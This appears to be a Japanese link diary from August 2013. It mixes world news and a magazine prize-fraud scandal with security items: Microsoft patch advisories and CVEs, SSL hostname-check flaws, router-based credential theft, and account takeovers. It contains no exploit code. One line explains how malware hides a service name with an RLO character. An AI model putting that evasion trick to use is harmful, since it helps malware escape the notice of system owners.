エンターブレインでゾンビというと、フェローズ / ハルタの「譲治ロメ夫」シリーズ (二宮香乃) なわけですが……。
》 ポモルニク型エアクッション揚陸艦が突如海水浴場に出現 (けが人なし)
海水浴場に巨大艦艇が突如出現 ロシア (NHK, 8/22)
Russian Navy Hovercraft Lands On Busy Beach (YouTube, 8/21)
ポモルニク型エアクッション揚陸艦
まさに化け物級!! ロシア軍が誇る世界最大のホバークラフト『ポモルニク型エアクッション揚陸艦(Zubr)』 (フィストリア, 2011.04.18)
ポモルニク型エアクッション揚陸艦 (ウィキペディア)
日本を強く抑止?中国がスーパー級エアクッション揚陸艦を配備へ (中国網, 5/28)
ポモルニク型エアクッション揚陸艦 中国が建造開始か (中国網, 8/1)
PuTTY 0.63 に対応した WinSCP 5.1.7 が 2013.08.14 に公開されてました。
》 秋田書店、景品数を水増しした上、担当者に罪を着せて解雇。 悪質すぎる。
消費者庁:読者プレゼント数水増し 秋田書店に措置命令 (毎日, 8/20)
水増しの理由について同社は「近年、メーカーから景品の無償提供を受けられなくなり、経費削減のためやった」と消費者庁に説明している。
(中略)
措置命令は、消費者庁が景表法に違反して消費者が誤解するような不当表示などをした業者に、その行為の撤回や再発防止を命じる行政処分。命令に従わない場合、命令を受けた法人には3億円以下の罰金、その代表者には2年以下の懲役または300万円以下の罰金が科される。
秋田書店:不正訴えた女性社員を解雇 撤回求め提訴へ (毎日, 8/21)
女性の説明や加盟する労働組合「首都圏青年ユニオン」などによると、女性は不正のあった雑誌でプレゼント担当を4年以上務めていた。
担当になった際の引き継ぎで不正を知り「一つの商品しかないのに、当選人数を10人にするのはおかしい」などと上司に訴えたが、「会社にいたかったら文句を言わずに黙って仕事をしろ」と言われたという。
女性は不正を続けているうちに睡眠障害や適応障害を発症、2011年9月から休職していたが、12年2月29日に「多数の読者にプレゼントを発送せず、不法に窃取した」と書かれた解雇通知書が送られてきた。
女性やユニオンは仕事を理由とした病気の発症で休職中に解雇するのは無効と主張。窃取と指摘された点について「会社の指示で当選者の数に満たないプレゼントしか準備されていなかった」としている。
秋田書店は「解雇と不正は別問題だと考えるため、コメントは差し控える」と話している。
秋田書店:景品水増し、先輩から業務引き継ぎ 元女性社員 (毎日, 8/21)
女性は「読者に申し訳ない思いで、本当に嫌だった」と語り、「プレゼントの数に多少の違いはあっても全誌で何らかの不正はあった。秋田書店はきちんと反省して出直してほしい」と話している。
株式会社秋田書店に対する景品表示法に基づく措置命令について (消費者庁, 8/20)
不当景品類及び不当表示防止法第6条の規定に基づく措置命令について (秋田書店, 8/20)
秋田書店、雑誌の読者プレゼントで当せん者数水増し (TBS, 8/20)
秋田書店の担当者は、消費者庁に対し「こうした行為は2005年ころから行っていた」「景気の悪化でプレゼントが集まらなくなったが、読者アンケートを集めるため当せん者数を水増しした」と説明。また、「他社でもやっている」とも話したということです。
秋田書店、毎日報道に反論。全面対決の模様。
秋田書店、読プレ不正・社員解雇報道に反論 「元社員が賞品をほしいままに不法窃取」 (ITmedia, 8/21)
【社告】毎日新聞の報道に対する弊社の見解について (秋田書店, 8/21)
上記の件に関し、8月21日付の毎日新聞夕刊に元社員を名乗る人物による証言記事が掲載されました。この記事は弊社への取材も一切おこなわれず一方的に元社員の言い分を掲載したものであり、また、書かれている内容と弊社の認識とは大きな隔たりがあり、とうてい容認することができません。
毎日記事によれば、『秋田書店は「解雇と不正は別問題だと考えるため、コメントは差し控える」と話している』なので、事前取材はしているはずなのだが……。
それで、他社は大丈夫なのか?
「秋田書店だけじゃない!」当選者なんて存在しないのか……雑誌懸賞の知られざる真実 (日刊サイゾー, 8/21)
この事例はまだ甘いほうだ。実は、世の中には読者プレゼント自体がすべてフィクションという雑誌もあるのだから。
そんなムチャな行為を行っているのが、エロ本や実話誌だ。ある実話誌の編集部員は語る。
「だいたい読者プレゼントページは、新人編集部員の仕事です。まず、プレゼントする商品の画像をネットから拾ってきて、ラフを書いてデザイナーに渡します。商品なんて最初からあるはずがありませんよ」
津田大介 @tsuda さんのツイート:
しかし、ぶっちゃけ、俺の知り合いの編集者は新人時代、読者プレゼント用の架空当選の名字と名前を適当に組み合わせるって仕事を割り当てられていたので、特定の雑誌業界では当たり前のようにある慣習だと思っていたよ>読者プレゼント問題。
— 津田大介 (@tsuda) August 21, 2013
アーマーモデリング編集部 @am_modelling さんのツイート:
担当はわたくし。メーカーさんも頑張ってくれてますし、たまには自腹もあるのに(泣 @jindoh 読プレってちゃんと発送してたって「どうせ送っていないんでしょ 」って言われるのに、秋田書店の件でますます疑われる予感。 時には編集部(というか俺や担当者の自腹)で用意してるというのに
— アーマーモデリング編集部 (@am_modelling) August 21, 2013
分析
秋田書店のプレゼント未発送事件が奇怪な方向へ(補足あり) (山本 一郎 / Yahoo, 8/21)
》 NROがITUに反論 (Geek なぺーじ, 8/7)。IPv4 アドレスの件。
》 インターネットの方針を決定する権限を巡る綱引き (Geek なぺーじ, 8/8)。WTPF-13、チュニスアジェンダ。
》 North Korea Halts Construction of New Long-Range Rocket Launch Facilities (38 north, 7/23)
》 Sohae Satellite Launching Station (Tongchang-ri) 3D Panoramas (38 north, 7/22)
》 NSA 方面 (PRISM、Verizon 通話記録収集等)
Guardian、元CIA職員の極秘データ入りHDDを破壊 “ロンドンからは”もう報道しない (ITmedia, 8/21)
アラン・ラスブリッジャー編集長は「当局には、米国とブラジルのオフィスにもデータのコピーがあるから、ロンドンオフィスのデータを引き渡しても意味がないと説明した。だが、当局がわれわれを提訴しそうであることが明らかだったので、データを当局に引き渡すよりも手元のデータを破壊することを選んだ」と語る。「スノーデン氏が何を入手したのかを当局に知らせたくなかった」
Guradianの編集者らは7月20日、英政府当局職員の立ち会いの下、人気のないオフィスの地下で極秘データの入ったHDDをグラインダーなどの工具で物理的に破壊し、職員らはこの様子を撮影して帰った。Guardianはこれを「デジタル時代のジャーナリズムにおける奇妙なエピソードになった」としている。
ラスブリッジャー編集長は、ロンドンオフィスでのスノーデン氏関連の報道はストップし、今後はジャーナリストの権利が守られている米国とブラジルで報道を続けることにしたという。
NSA files: why the Guardian in London destroyed hard drives of leaked files (Guardian, 8/20)
スノーデン関連のディスク、英当局が破壊を強要:ガーディアン紙 (WIRED, 8/21)
米政府の監視活動問題をめぐり英当局が英紙に資料破壊を要請---Guardian報道 (日経 IT Pro, 8/21)
ガーディアン記者のパートナー、英政府などに法的措置 空港での拘束で (ウォール・ストリート・ジャーナル日本版, 8/21)
David Miranda, schedule 7 and the danger that all reporters now face (Guardian, 8/19)
ムルシ派デモを強制排除
時論公論 「強制排除 どうなるエジプト」 (NHK 解説委員室, 8/16)
「非常事態宣言」は、ムバラク政権の30年間、一度も解除されることなく、 当時は非合法とされていた「ムスリム同胞団」をはじめ、 反対派を弾圧する手段として使われていましたが、 再びその時代に戻ったかのようです。
今回、1か月間ということですが、混乱が収まらなければ、 軍と暫定政府によって、期間がいくらでも延長される可能性があります。 その間は、逮捕状なしの身柄の拘束が行われ、 言論や政治活動の自由も保障されず、「民主主義」とは相容れません。
エジプト衝突、死者638人けが4千人に デモ強制排除 (朝日, 8/16)
エジプト、強制排除の現場映像 黒煙、銃声響く住宅地 (朝日, 8/16)
過激化防ぐ安全弁失う エジプト、デモ強制排除 中東アフリカ総局長・川上泰徳 (朝日, 8/16)
実弾狙撃、犠牲が拡大 エジプト強制排除「プロの仕業だ」 (朝日, 8/17)
エジプト治安当局、ムスリム同胞団の最高指導者バディア氏の身柄を拘束
エジプト当局、ムスリム同胞団の最高指導者を逮捕 (ロイター, 8/20)
ムスリム同胞団、国民の多くから「テロリスト」呼ばわり (AFPBB, 8/20)
軍出身でない初のエジプト大統領となったムハンマド・モルシ(Mohamed Morsi)前大統領を誕生させた栄華の後、ムスリム同胞団は没落の一途をたどっている。モルシ前大統領が解任された7月3日以降、暫定政権や軍当局の声明、国営テレビの報道にあおられる形で、国民の間では反同胞団の機運が高まっている。
ムスリム同胞団 組織的行動が困難に (NHK, 8/21)
ムスリム同胞団、抑制的な反応—最高指導者拘束で (ウォール・ストリート・ジャーナル日本版, 8/21)
ムスリム同胞団新指導者について (中東の窓, 8/21)。al arabiya net 記事の紹介。
エルバラダイ氏の行方
エジプトのエルバラダイ暫定副大統領が辞表提出 (ロイター, 8/15)
エルバラダイ氏を大学教授が告発 エジプト副大統領辞任は背信行為と主張 (ロイター, 8/21)
エジプト:エルバラダイ氏訴追 司法当局が刑事告発を受理 (毎日, 8/21)
ムバラク氏釈放?!
エジプト裁判所、ムバラク元大統領の釈放を命令—混迷の恐れ (ブルームバーグ, 8/19)
エジプト・ムバラク元大統領近く保釈か、モルシ氏は拘束再延長 (ロイター, 8/20)
エジプトのムバラク元大統領の保釈、21日に審理へ (ロイター, 8/21)
マラウィ国立博物館襲撃さる
エジプト:国立博物館が襲撃被害 収蔵品ほぼ奪われる (毎日, 8/20)
対エジプト西側経済制裁の影響(アラビア語メディアの論調) (中東の窓, 8/20)
焦点:エジプト騒乱にアルカイダの影、勢力拡大へ「絶好の機会」か (ロイター, 8/21)
ここに注目! 「出口見えないエジプトの危機」 (NHK 解説委員室, 8/20)
》 The "Hoko Tate" TV show writeup (Hack for food for thought, 8/19)。ほこたての件、攻撃側からの解説。 防御側については、 6月9日(日) に放映された「ほこたて」の「たて」の裏側について (NetAgent, 6/11) をどうぞ。
》 鶴岡工場閉鎖で任天堂苦悩 Wii Uの未来に再び暗雲 (週刊ダイヤモンド, 8/20)
Wii Uは4〜6月期に今年度の販売目標900万台の2%以下の16万台しか売れない極度の不振。鶴岡工場の稼働率も今年に入り低空飛行を続け、赤字を垂れ流していた。
そんなにひどいんだ……。いや、俺も買ってないけど。
》 ETagを利用してアクセスしてきたブラウザを識別する手法 (slashdot.jp, 8/21)
》 ニンテンドー3DSの3D技術における特許侵害を問う訴訟、賠償金額は約15億円に (slashdot.jp, 8/21)
》 九州大:「数万年要する」暗号解読 2週間で成功 (毎日, 8/21)
次世代暗号を対象とした解読コンテストで世界記録を達成 (KDDI 研究所, 7/19)
今回、効率的な並列処理が困難とされていた解読アルゴリズムの高速化並びに並列化の開発に成功し、128次元のイデアル格子最短ベクトル問題を、商用クラウドの84台の仮想PCを利用して、約2週間で解読いたしました。
》 Nmap Changelog (Nmap.org, 8/17)。 Nmap 6.40 出ています。
》 Welcome to Zmap, the "one hour turnaround" internet scanner (Sophos, 8/20)。爆速スキャナ ZMap。 IPv4 空間全体を 45 分 (!!!) でスキャンできるそうだ。
》 サイバーセキュリティの規範を定義するうえでの課題と機会 (日本のセキュリティチーム, 8/20)
》 過去最悪の治安状態で装甲車がブーム、パキスタンのカラチ (AFPBB, 8/20)
経済的な余裕のある人々は、カラシニコフ自動小銃(AK-47)の銃弾から身を守る防弾窓ガラスや、爆弾攻撃にも耐えられる車台などを、自家用車に装着している。
Bullet Resistant Glass (phoenicia-ltd.com) によると、AK-47 を防げるというのは、 STANAG 4569 レベル 2 のようです。
車両の装甲装備を取り扱う企業 (中略) の一社、 「ストレイト(Streit)」のパキスタン支社トップ、ハリド・ユサフ(Khalid Yousaf)氏は (中略) 「設立当初は装甲車両数を月3〜4台と見込んでいたが、最初の数か月からすでに月7台、それが10台に伸び、現在では月15台前後のペースとなっている。今後さらに増えるかもしれない」と語った。
そんな会社が複数あると……。
オープンソース PHP に、「PHP 5.5.2」「PHP 5.4.18」登場 — セキュリティと安定性を向上 (japan.internet.com, 2013.08.20)
だが「CVE-2013-4113」は、7月にリリースされた 5.5 ブランチ向けの「PHP 5.5.1」および 5.3 ブランチ向けの「PHP 5.3.27」で、すでに修正済みになっていたものだ。
私には、PHP がなぜすべてのブランチ向けのセキュリティアップデートを同時リリースしないのか、まったく理解ができない。あるブランチでのセキュリティアップデートをリリースすることで、別ブランチに脆弱性が存在することがアタッカーに明らかになってしまう。5.5 ブランチと 5.3 ブランチで「CVE-2013-4113」が修正されてから、5.4 ブランチは一か月近くリスクに曝されていたことになる。
OCN認証ID・パスワードの不正利用防止に向けた セキュリティ上の脆弱性があるブロードバンドルータの利用調査および対策の実施について
関連:
ロジテック製300Mbps無線LANブロードバンドルータ (LAN-W300N/R、LAN-W300N/RS、LAN-W300N/RU2)に関するお詫びとお願い (ロジテック, 2013.08.20)
Apache Strutsの脆弱性に攻撃を仕掛けるハッキングツールとWebShell (トレンドマイクロ セキュリティ blog, 2013.08.09)
Google Chrome の gupdate に偽装した、マルウェアの更新サービス名の事例。 RLO を使い、[RLO]etadpug とすると、一見 gupdate に見える。
Yosuke HASEGAWA @hasegawayosuke さんのツイート:
RLOによるレジストリ汚染の隠ぺいとか実際に出てきたのをみると、時代が俺に追いついた感を感じる!
— Yosuke HASEGAWA (@hasegawayosuke) August 20, 2013
Chrome 29.0.1547.57 公開。25 件のセキュリティ修正が含まれてます。
予定どおり出たけれど、Exchange や ADFS の更新プログラムに不具合があったみたいで。
MS13-059 - 緊急: Internet Explorer 用の累積的なセキュリティ更新プログラム (2862772)
IE 6〜10 に計 11 件の欠陥、攻略 Web ページを閲覧すると任意のコードが実行されるなど。
Internet Explorer のメモリ破損の脆弱性 - CVE-2013-3184
Exploitability Index: 1
プロセス整合性レベルの割り当ての脆弱性 - CVE-2013-3186
Exploitability Index: N/A
Internet Explorer のメモリ破損の脆弱性 - CVE-2013-3187
Exploitability Index: 1
Internet Explorer のメモリ破損の脆弱性 - CVE-2013-3188
Exploitability Index: 1
Internet Explorer のメモリ破損の脆弱性 - CVE-2013-3189
Exploitability Index: 1
Internet Explorer のメモリ破損の脆弱性 - CVE-2013-3190
Exploitability Index: 1
Internet Explorer のメモリ破損の脆弱性 - CVE-2013-3191
Exploitability Index: 2
EUC-JP 文字エンコードの脆弱性 - CVE-2013-3192
Exploitability Index: N/A
Internet Explorer のメモリ破損の脆弱性 - CVE-2013-3193
Exploitability Index: 1
Internet Explorer のメモリ破損の脆弱性 - CVE-2013-3194
Exploitability Index: 1
Internet Explorer のメモリ破損の脆弱性 - CVE-2013-3199
Exploitability Index: 1
MS13-060 - 緊急: Unicode スクリプト プロセッサの脆弱性により、リモートでコードが実行される (2850869)
Windows XP、Server 2003 に欠陥。Unicode スクリプト プロセッサに欠陥があり、攻略文書や攻略 Web ページを開くと任意のコードが実行される。 CVE-2013-3181
Exploitability Index: 2。
MS13-061 - 緊急: Microsoft Exchange Server の脆弱性により、リモートでコードが実行される (2876063)
Exchange 2007、2010、2013 に 3 件の欠陥。いずれも Oracle Outside In 関連。攻略ファイルを閲覧すると LocalService 権限で任意のコードを実行できるなど。 CVE-2013-2393 CVE-2013-3776 CVE-2013-3781
Exploitability Index: 2
「Exchange Server でサーバー上のメールのインデックス処理が停止する」という副作用が報告されたため、Exchange 2013 用の更新プログラムは公開停止となっている。Exchange 2007、2010 用の更新プログラムは問題ない模様。
Windows XP、Server 2003、Vista、Server 2008、7、Server 2008 R2、8、Server 2012、RT に欠陥。非同期 RPC リクエストの処理に欠陥があり、攻略 RPC リクエストによって任意のコードを実行できる。CVE-2013-3175
Exploitability Index: 1
Windows XP (32bit)、Server 2003 (32bit)、Vista、Server 2008、7、Server 2008 R2、8 (32bit) に 4 件の欠陥。ASLR を回避したり、local user による権限上昇が可能。
ASLR セキュリティ機能のバイパスの脆弱性 - CVE-2013-2556
Exploitability Index: N/A
Windows カーネル メモリの破損の脆弱性 - CVE-2013-3196
Exploitability Index: 1
Windows カーネル メモリの破損の脆弱性 - CVE-2013-3197
Exploitability Index: 1
Windows カーネル メモリの破損の脆弱性 - CVE-2013-3198
Exploitability Index: 1
MS13-064 - 重要: Windows NAT ドライバーの脆弱性により、サービス拒否が起こる (2849568)
Windows Server 2012 に欠陥。NAT Driver サービスに欠陥があり、攻略 ICMP パケットによって応答しなくなる。機能復活には OS の再起動が必要。 CVE-2013-3182
Exploitability Index: 3
Windows Vista、Server 2008、7、Server 2008 R2、8、Server 2012、RT に欠陥 。ICMPv6 の処理に欠陥があり、攻略 ICMPv6 パケットによって応答しなくなる。機能復活には OS の再起動が必要。CVE-2013-3183
Exploitability Index: 3
MS13-066 - 重要: Active Directory フェデレーション サービスの脆弱性により、情報漏えいが起こる (2873872)
Windows Server 2003、2008、2008 R2、2012 に欠陥。 Active Directory フェデレーション サービスに欠陥があり、アカウント情報が意図せず漏洩する。CVE-2013-3185
Exploitability Index: 3
更新プログラムのうち、Windows Server 2008 および 2008 R2 上の Active Directory フェデレーション サービス 2.0 用の更新プログラム 2843638 および 2843639 には、ADFS が機能しなくなる不具合があったため一旦非公開となった。 その後 2013.08.20 に、2843639 の機能を取り込んだ、新しい 2843638 更新プログラムが公開された。
MS13-061 - 緊急: Microsoft Exchange Server の脆弱性により、リモートでコードが実行される (2876063) の Exchange 2013 用の更新プログラム 2874216 が再リリースされた。
2013 年 8 月 14 日にリリースされたオリジナル版の更新プログラムには、Exchange Server でサーバー上のメールのインデックス処理が停止する問題があり、この再リリース版ではその問題を解決しています。
》 HTTP error code 451: "Unavailable For Legal Reasons" (Sophos, 8/19)。 451 について日本語で読める記事は、たとえば、
HTTPの新ステータスコード「451 Unavailable for Legal Reasons」を、グーグルのTim Bray氏がIETFに提案 (publickey, 2012.06.13)
HTTP Status Code 451 - Unavailable For Legal Reasons (Geek なぺーじ, 2012.08.01)
世界のびっくりニュース: SFの巨匠、ブラッドベリに敬意を表し、新ステータスコード「451:法的に利用不可」が提案される (dailynewsagency, 2012.06.25)
》 「パスワードは電話で」——女性スマホユーザー狙う悪質アダルトサイトに注意 (so-net セキュリティ通信, 8/19)
》 ランサムウェアBrowlockが新たな国々を標的に (エフセキュアブログ, 8/15)。ローカライズの様子。
》 「MiniDuke」型の脅威を阻止するため、エクスプロイトのインターセプトを用いる (エフセキュアブログ, 8/15)。DeepGuard の宣伝。
》 Java - 与え続ける才能 (エフセキュアブログ, 8/14)
》 お勧め:ポーランドCERTによるZeus P2Pのレポート (エフセキュアブログ, 8/16)。
》 ある神経外科医がマリファナに対する否定的な考えを改めた理由 (gigazine, 8/19)。マリファナと聞くと、ついつい Hey! ギャモンを連想してしまう。
》 Google Glassに究極のアプリが登場: 警官,消防士,災害救助などの現場が使用する多用途情報機器へ (techcrunch, 8/20)。Mutualink。
Mutualinkは今すでに、NATOの特殊部隊や、合衆国の国土安全保障省、警察庁、消防庁などにサービスを提供している。つまり、この製品の基盤となるような関係が、すでにあったわけだ。
》 【夏休みネタ】「若年性冷凍庫侵入症」はグローバルな現象である (栗原潔のIT弁理士日記, 8/19)
》 朝日新聞が自民党比例区当選者を支援した宗教団体一覧を掲載 本紙追及の北村経夫参議院議員を支援していたのは、やはり統一教会系のあの団体 (やや日刊カルト新聞, 8/16)
》 平成25年度総合セキュリティ対策会議の概要及び第1回発言要旨 (警察庁, 8/20)
》 国内のネットバンキング被害が過去最悪のペースで拡大中 (FFRI Blog, 8/20)
上記データにあるとおり、近年ではフィッシングによる被害は減少傾向にあり、その代わりにマルウェアによる被害が拡大しています。 特に、本BLOGでも何度かご紹介してきたMITB(Man in the Browser)攻撃(マルウェアによるブラウザへの干渉)に起因すると思われる事象は、2012年10月以降、日本でも顕在化しており、様々な金融機関のWebサイトで注意喚起されています。
関連: 【重要なお知らせ】ネットバンキング不正利用防止について (so-net セキュリティ通信, 8/19)
》 「Web改ざんと不正アクセス急増」と注意喚起、トレンドマイクロが13年上期の脅威動向を発表 (日経 IT Pro, 8/19)
さらに深刻化しているのは、オンライン銀行詐欺ツールを利用した攻撃である。同社の調査によると、日本でオンライン銀行詐欺ツールを利用した攻撃件数が急増しており、2013年上半期の検出数は、前年同期比2.49倍の2万916件だったという。
急増の背景について染谷氏は、「(アンダーグラウンドで売買されている)ツールキットの価格が暴落している。中にはソースコードが公開されているツールキットもあり、詐欺ツール開発が容易になった」と指摘。すでに海外では深刻となっている同攻撃が、今後日本でも本格化する可能性が高いとの見方を示した。
》 「ウイルス配布サイトは使い捨て」——標的型攻撃の実態 ファイア・アイが報告 (日経 IT Pro, 8/19)
》 武雄市長が建築基準法の規制緩和を求めている理由 (slashdot.jp, 8/19)、 武雄市図書館2階のポールパーティションと巨大書架のリスク (togetter, 7/31)。あいかわらずの武雄市。
》 Googleが,外国において訴訟を提起されても米国の法律しか適用されないと主張 (サイバー法ブログ, 8/19)
》 Amebaに24万3266件の不正ログイン、ユーザー情報が閲覧された可能性 (日経 IT Pro, 8/13)
「Ameba」への不正ログインに関するご報告 (サイバーエージェント, 8/12)
不正ログインが発生していた期間は2013年4月6日(土)〜2013年8月3日(土)の間で、不正ログインの対象となったIDは、243,266件となります。
(中略)
今回の不正ログインの手法は、昨今インターネットサービスで発生しているものと同様に他社サービスから流出した可能性のあるID・パスワードを利用して行っているものと推測されるため、「Ameba」をご利用のすべてのお客さまに対しても、パスワード変更をお願いしてまいります。
「Ameba」への不正ログインに関する追加ご報告 (サイバーエージェント, 8/16)
今回の不正ログインの対象となった243,266件のIDに関して、第三者に閲覧された可能性のある「Ameba」の登録情報(ニックネームやメールアドレス、生年月日など)について、改ざんの事実は確認されておらず、仮想通貨「アメゴールド」「コイン」の不正利用も発生していないことを確認いたしました。また、「Ameba」の一部サービスにてご利用いただいていたクレジットカード情報(※)や、ご登録いただいていた住所、電話番号などの個人情報の流出はございませんでした。
2013.06.26 に公表された、インターネット接続サービス「OCN」における 認証パスワードを不正に変更された事象について (NTT.com) の原因は、昨年 5 月に発表された、ロジテックのブロードバンドルータの欠陥だったことが判明。欠陥を突かれて、認証情報が漏洩していた。 これを受けて、NTT.com が個別調査を実施し、該当する顧客に対応を依頼することになったそうで。今日から 10/31 まで。
NTT Comは、これまでOCNをご利用のお客さまに対して認証パスワードの定期的な変更とブロードバンドルータのファームウェア更新をお願いしてきましたが、このような状況を踏まえ、不正利用防止を徹底するため、OCNをご利用のお客さまを対象にセキュリティ上の脆弱性が判明している該当のブロードバンドルータのご利用に関する調査を実施するとともに、当該機器の利用が確認されたお客さまには不正利用防止に向けた対応を個別にお願いすることとしました。
(中略)
これまで、お客さまがご利用の宅内機器のセキュリティ上の脆弱性に対して調査を行い、お客さま個別に対策措置を取ることができておりませんでしたが、今回、お客さまのより安心安全なインターネット利用のため、インターネットサービスプロバイダー(ISP)としては国内で初めて本対策を実施することとしました。
関連:
ロジテック製300Mbps無線LANブロードバンドルータ (LAN-W300N/R、LAN-W300N/RS、LAN-W300N/RU2)に関するお詫びとお願い (ロジテック, 2013.08.20)
脆弱性保有ブロードバンドルータの状況調査および対策について (Telecom-ISAC Japan, 2013.08.30)。Telecom-ISAC Japan が協力要請に基づき調査を実施、結果を ISP に連絡する模様。
この調査は、協力要請をいただいた会員ISPのIPアドレス帯に対して、該当製品の所在を簡易な通信コマンドで確認するものです。ネットワーク利用者に負荷をかけるものや、通信の内容を見るようなものでは一切ありません。
また、調査の実施につきましては、8月30日から順次行うことを予定しております。
実は他社でも起こっている! OCNを襲った不正アクセス事件にISP各社はどう対処すべきか (日経 IT Pro, 2013.09.27)
家庭のネットIDなど悪用被害150件超 (NHK「かぶん」ブログ, 2013.10.25)
》 感染したアカウントがマルウェアへのリンクをツイート (シマンテック, 8/12)
感染した一連のアカウントが出現するようになったのは 7 月の初め頃で、影響は全世界のユーザーに及んでいます。数週間で広範囲のアカウントが感染しましたが、すでに何百というツイートが送信されているにもかかわらず、多くのユーザーは自分のアカウントが悪質なツイートを送信していることに気づいていません。
》 終わらない "LNK" 攻撃 (シマンテック, 8/14)
》 英国:原発「解体先進国」 稼働26年、廃炉に90年 (毎日, 8/19)。オレ達はようやく登りはじめたばかりだからな。このはてしなく遠い廃炉坂をよ……。
》 『宇宙戦艦ヤマト2199』のSFネタ解説その4:七色星団の戦い(第6章ネタバレあり) (銅大のてなもんやブログ, 7/23)。UX-01 を攻撃部隊に投入できなかったのが痛すぎるよなあ。
》 「はだしのゲン、自由に読ませて」電子署名2日で6千人 (朝日, 8/18)、 「生きろゲン!」松江市教育委員会は「はだしのゲン」を松江市内の小中学校図書館で子どもたちが自由に読めるように戻してほしい。 (Change.org)
》 パスワードリスト攻撃の2013年4月〜8月の状況についてまとめてみた。 (piyolog, 8/18)
「パスワードリスト攻撃」はIPAが2012年7月の届け出状況の報告で使い始めた言葉です。セキュリティの専門家やセキュリティベンダ(例えばSST)もこの言葉が使われているシーンを見かけます。この記事でもIPAにならってパスワードリスト攻撃という名称で記載していますが、IDとパスワードがセットで使われる攻撃にも関らずパスワードのみのリストのような「パスワードリスト」と表現されるのは今一腑に落ちないところでもあります。もしかすると「パスワードを使いまわしている人をリストアップした攻撃」の略なのかも知れません。:)
》 GitHubにおけるオープンソースライセンス問題と「ポスト」オープンソースソフトウェア (YAMDAS現更新履歴, 8/19)
》 LINE:「突然仲間外れ」子供トラブル相談急増 (毎日, 8/19)
》 捜査対象車にGPS端末 警察が無断で設置、各地で発覚 (朝日, 8/17)、 落合弁護士の見解。
》 【Twitter】 「ピザハット」店員がピザ生地を顔に貼り付けた写真公開→大炎上 (痛いニュース, 8/18)、 当社アルバイト従業員による不適切な行為についてのお詫びとお知らせ (日本ケンタッキー・フライド・チキン, 8/19)。ピザハットって KFC だったんだ。
》 「品川庄司」庄司、ツイッター「被害」を報告 ホテル従業員が「住所わかった今度行こう」 (J-CAST, 8/9)
》 BPOが「配慮を欠く」としたフジテレビ「加害生徒の実名」流出 背景は現場の「超多忙」と「人権軽視」 (水島宏明 / Yahoo, 8/10)、 「大津いじめ事件報道に対する申立て」に関する委員会決定 (BPO, 8/9)
よくよく考えてみると、1つのニュースを放送するのに、これほど多くの編集者が同時平行で編集するという現状は異常ともいえる。工場の作業ラインのように「超分業」で行うテレビニュースの「つくり方」に根本的な問題があるとみるべきだ。最近のニュース現場で編集作業をしたことがある人間なら、ある程度のミスはどうやっても、日常的に避けられないという実感を持つはずだ。何人もの人間たちが別々に分かれて作業すると、伝達や確認が行き届かないことはどうしても起きてしまう。
》 IPAテクニカルウォッチ 「脆弱性検査と脆弱性対策に関するレポート」の公開 (IPA, 8/8)。インターネットを介した各種攻撃の主たる原因である"脆弱性"を低減する検査手法の紹介と解説、だそうです。
》 グーグル:約2分の停止で、世界のトラフィックが40%減少! (WIRED, 8/19)。ハイパー・ジャイアントのハイパー・ジャイアントたる所以。
》 Windows 8.1、日本時間10月17日より公開へ (Internet Watch, 8/15)
LastPass password manager gets security patch against password leakage bug (Sophos, 2013.08.18)、最近のLastPassへの変更: v2.5.0/1/2 - Aug 16th 2013 -- All Browsers (LastPass, 2013.08.16)。
Resolved: Security issue with IE exclusively while logged in to LastPass only: Prevent IE from adding passwords to in memory decryption cache.
Windows で LastPass を使っている人は更新しませう。
Hostname check bypassing vulnerability in SSL client (CVE-2013-4073) (Ruby, 2013.06.27)。subjectAltName における NULL の扱いに関する欠陥。 Ruby 2.0.0-p247, 1.9.3-p448, 1.8.7-p374 で修正されている。 CVE-2013-4073
SSL module fails to handle NULL bytes inside subjectAltNames general names (CVE-2013-4238) (Python, 2013.08.12)。Python にも Ruby の CVE-2013-4073 と同様の欠陥。 Python 2.7, 3.1, 3.2, 3.3, 3.4 用の patch が示されている。 CVE-2013-4238
JVN#75084836: Android 版 Yahoo!ショッピングにおける SSL サーバ証明書の検証不備の脆弱性 (JVN, 2013.08.19)。最新のアプリでは修正されている。
JVN#68156832: ヤフオク! における SSL サーバ証明書の検証不備の脆弱性 (JVN, 2013.08.19)。最新のアプリでは修正されている。
JVNDB-2013-003749: MongoDB で使用される mongo-python-driver におけるサービス運用妨害 (DoS) の脆弱性 (JVN, 2013.08.19)
Facebookの脆弱性、発見者がZuckerberg CEOのウオールを使って証明 (日経 IT Pro, 2013.08.19)、 facebook vulnerability 2013 (khalil)。現在は修正されているそうですが、Facebook 側の対応がショボすぎる。
マーク・ザッカーバーグ氏の Facebook タイムラインがパレスチナ人の研究者にハッキングされる (Sophos, 8/20)
AppleのApp Storeに悪質アプリをアップロード、審査の甘さを研究者が指摘 (ITmedia, 2013.08.19)、 Remotely Assembled Malware Blows Past Apple’s Screening Process (MIT Technology Review, 2013.08.15)
Android の暗号化に関する問題が数十万ものアプリに影響する恐れ (シマンテック, 2013.08.14)、 Some SecureRandom Thoughts (Android Developers Blog, 2013.08.14)。SecureRandom クラスの実装に欠陥。Android バージョン 4.2 で修正されている。
PHP 5.5.2 / PHP 5.4.18 公開。セキュリティ修正が含まれている。
Fixed handling null bytes in subjectAltName (CVE-2013-4248).
Implemented strict sessions RFC (https://wiki.php.net/rfc/strict_sessions) which protects against session fixation attacks and session collisions (CVE-2011-4718).
PHP にも Ruby の CVE-2013-4073 と同様の欠陥があったと。
Fixed handling null bytes in subjectAltName (CVE-2013-4248).
Fixed bug #65236 (heap corruption in xml parser, CVE-2013-4113).
オープンソース PHP に、「PHP 5.5.2」「PHP 5.4.18」登場 — セキュリティと安定性を向上 (japan.internet.com, 2013.08.20)
だが「CVE-2013-4113」は、7月にリリースされた 5.5 ブランチ向けの「PHP 5.5.1」および 5.3 ブランチ向けの「PHP 5.3.27」で、すでに修正済みになっていたものだ。
私には、PHP がなぜすべてのブランチ向けのセキュリティアップデートを同時リリースしないのか、まったく理解ができない。あるブランチでのセキュリティアップデートをリリースすることで、別ブランチに脆弱性が存在することがアタッカーに明らかになってしまう。5.5 ブランチと 5.3 ブランチで「CVE-2013-4113」が修正されてから、5.4 ブランチは一か月近くリスクに曝されていたことになる。
上記↑した PHP コード部分が avast にひっかかり、PHP:BackDoor-BG [Trj] と判定されるそうです。yuu さん、hue @notwobad さん、竹本さん情報ありがとうございます。
はだしのゲン:松江市教委、貸し出し禁止要請「描写過激」 (毎日, 8/16)
市教委が内容を改めて確認。「旧日本軍がアジアの人々の首を切ったり女性への性的な乱暴シーンが小中学生には過激」と判断し、その月の校長会でゲンを閉架措置とし、できるだけ貸し出さないよう口頭で求めた。
